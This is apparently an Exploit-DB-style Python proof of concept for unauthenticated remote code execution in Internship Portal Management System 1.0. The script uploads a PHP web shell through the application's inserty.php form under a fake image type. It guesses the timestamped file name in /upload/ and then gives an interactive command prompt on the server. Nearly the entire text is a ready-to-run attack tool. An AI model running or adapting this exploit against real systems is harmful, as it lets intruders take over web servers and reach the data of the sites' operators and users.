# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argenestel # Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: Debian 10 import requests import time #change the url to the site running the vulnerable system url="http://127.0.0.1:4000" #burp proxy proxies = { "http": "http://127.0.0.1:8080", } #payload payload='"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>' #the upload point insert_url=url+"/inserty.php" def fill_details(): global payload global shellend global shellstart print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload") #time start shellstart=int(time.time()) #print(shellstart) files = {'file':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "company_name":"some", "first_name":"some", "last_name":"some", "email":"some@some.com", "gender":"Male", "insert_button":"Apply", "terms":"on" } r = requests.post(insert_url, data=data, files=files) if r.status_code == 200: print("Exploited Intern System Successfully...") shellend = int(time.time()) #print(shellend) shell() else: print("Exploit Failed") def shell(): for shellname in range(shellstart, shellend+1): shellstr=str(shellname) shell_url=url+"/upload/"+shellstr+"_shell.php" r = requests.get(shell_url) if r.status_code == 200: shell_url=url+"/upload/"+shellstr+"_shell.php" break r = requests.get(shell_url) if r.status_code == 200: print("Shell Starting...") while True: cmd=input("cmd$ ") r = requests.get(shell_url+"?cmd="+cmd) print(r.text) else: print("File Name Error") fill_details()